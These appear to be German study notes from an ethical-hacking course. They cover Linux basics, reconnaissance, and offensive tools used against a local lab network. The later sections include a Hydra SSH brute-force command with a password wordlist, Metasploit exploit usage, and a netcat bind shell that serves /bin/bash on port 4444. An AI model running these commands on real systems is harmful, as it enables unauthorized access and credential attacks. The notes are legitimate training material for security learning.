Skip to main content

Heise Hacking Kurs LinkedIn Learning

Testumgebung:
Windows-Rechner:
IP-Adresse: 10.1.1.129
MAC-Adresse: BA-F0-EC-81-03-92
Kali-Linux:
IP-Adresse: 10.1.1.128
MAC-Adresse: FE-3A-E0-10-0E-35

Serverschutz Bausteine von BSI

Schichtenmodel TCP/IP

image.png

Infos

Generell

127.0.0.1 = localhost : Jedes Paket geht wieder zurück auf den sendenden Rechner

Wireshark 

ARP = Address Resolution Protocol dient dazu MAC adressen auszulesen 


Befehle: 

Befehl Beispiel
sipcalc sipcalc 192.168.178.0/24 Stellt die Subnetzmaske mit den IP-Adressen dar
ls -la | grep ls -la | grep go Gibt dann nur Inhalte wieder, die go enthalten
find  find . Gibt alles aus
find . | grep find . | grep go Findet alles in Laufwerk und gibt aber nur inhalte mit go zurück 
locate
Suche über die gesamte Festplatte
pwd pwd Print Working Directory - Aktuelles laufwerk anzeigen
whoami whoami Aktueller Benutzer
cd cd Springt direkt ins homeverzeichnis
ps aux
Zeigt Prozesse an
ps aux | grep apache2
Zeigt alles mit apache2 an
cat
Zeigt dateiinhalt an
cat  cat > hackingskills

cat >> hackingskills

Erstellt eine Datei direkt  
Benden mit Ctrl + d
dadurch wird die Datei um weitere Zeilen erweitert

grep sudo cat /etc/config-datei | grep output

Sucht nach dem String Output

nl

zeigt den inhalt einer datei mit den Zeilennummern an. 

Kann auch mit grep verbunden werden

sed


netstat


ip


dig dig linkedin.com ns

Zeigt die Nameserver an 


dig li


Linux Hilfe 

aircrack-ng aircrack-ng --help | more

Zeigt die HIlfe an mit jeder seite
Leertaste für nächste Seite 

q für Beenden 

man aircrack-ng   Zeigt das Manual an

Finden in Linux

locatelocate apache2.conf zeit an wo dateien liegen. (Datenbank aktualisieren: updatedb)
whereiswhereis nmap
whichwhich nmap
findfind / -type f -name apache2 Zeigt f = Dateien an die im / Homeverzeichnis liegen. Mit sudo werden alle dateien gefunden.
findfind /etc -tpye -f -name apache2.* findet alles in etc mit dem Namen apache2 

Berechtigungen

-rw-r--r-- 1 dapelza dapelza 0 31. Jan 10:19 test.txt Berechtigung User Gruppe Größe Datum Dateiname 3 Bits Besitzer 3 Bits Gruppe 3 Bits alle anderen

Bit Berechtigung
r Read
w Write
Execute (Ausführen)
Berechtigung ändern

chmod +x test.txt
Alle dürfen ausführen
chmod -x test.txt
Berechtiung nehmen
chmod u+x test.txt
Nur der User darf die Datei ausführen
chmod g+x test.txt
Gruppe darf ausführen


Phasen des Hacking

image.png

Passives Scannen

hunter.io

Email-Adressen von Unternehmen herausfinden

Burp Suite

Zum Auslesen von Http Code über einen Proxy

DefaultCreds-cheat-sheet

DefaultCreds-cheat-sheet/DefaultCreds-Cheat-Sheet.csv at main · ihebski/DefaultCreds-cheat-sheet · GitHub

Webseiten überprüfen

builtwith.com


Aktives Scannen

Nmap

Parameter Kommentar
nmap -sn 10.1.1.0/24
Pingt einen ip-Bereich und gibt die Teilnehmer wieder.
nmap 10.1.1.136 -v Vorher schon ergebnisse Anzeigen
nmap 10.1.1.136 -oN /pfad/zur/datei speichert die ergebnisse in einer Datei ab
nmap 10.1.1.136 -p40,21 können bestimmte Ports gescannt werden 
nmap 10.1.1.136 -sU Scannta auch udap 
nmap 10.1.1.136 -A Führt scripte aus

Dirbuster

Scannt nach unterverzeichnisen auf einer Domain


Im internet nach Exploits suchen 

Beispiel: exploitdb Wordpress 4.9

searchsploit 

findet schwachstellen in einer Software

smbmap 

findet schwachstellen in der SMB freigabe

smbmap -u '' -H 10.0.2.9

-u '' = User aber nicht angeben. 

Enum4Linux 

findet usernamen

enum4linux 10.1.1.150 -U


Hydra

Brutforce auf ssh oder smb

hydra -l jan -P /usr/share/wordlist/rockyou.txt ssh://10.1.1.12 -t 4


Exploit-Datenbanken

www.exploit-db.com
www.cvedetails.com


Exploits

Metasploit framework

msfconsole

Bevor man mit msf los legt:

Datenbank starten

sudo msfdb init

Postgressql dienst starten

sudo systemctl start postgresql

Metasploit verwenden

Module

search proftp


use exploit/windwos/ftp/proftp_banner

oder

use 4

danach: 

options

set Rhosts

show payloads

show targets

Netcat

Opfer

nc -lvp 4444 - Damit kann man generell auf eine Verbindung lauschen

nc -lvp 4444 -e /bin/bash - Würde bei Verbindung eine Shell starten

Angreifer

nc 10.1.1.138 4444 - Stellt eine Verbindung zum lauschenden Opfer auf dem Port 4444 her


Pentest MOnkey reverse shell

Tools

SED 

Suchen und ersetzen

Mit suchen und ersetzen kann man in einer Datei Wörter ersetzen. 

sudo sed s/mysql/MySQL/g /etc/irgendwas.conf > igendwasneu.conf # s = substizution: mysql wird durch MySQL ersetzt in der ganzen Datei (/g)

Netstat

netstat -r Zeigt die Netzwerkkarte das Standardgateway an. 

IP

ip a sh # sh = Show

# Ip Adresse ändern 

ifconfig eth0 10.1.1.109 netmask 255.255.255.0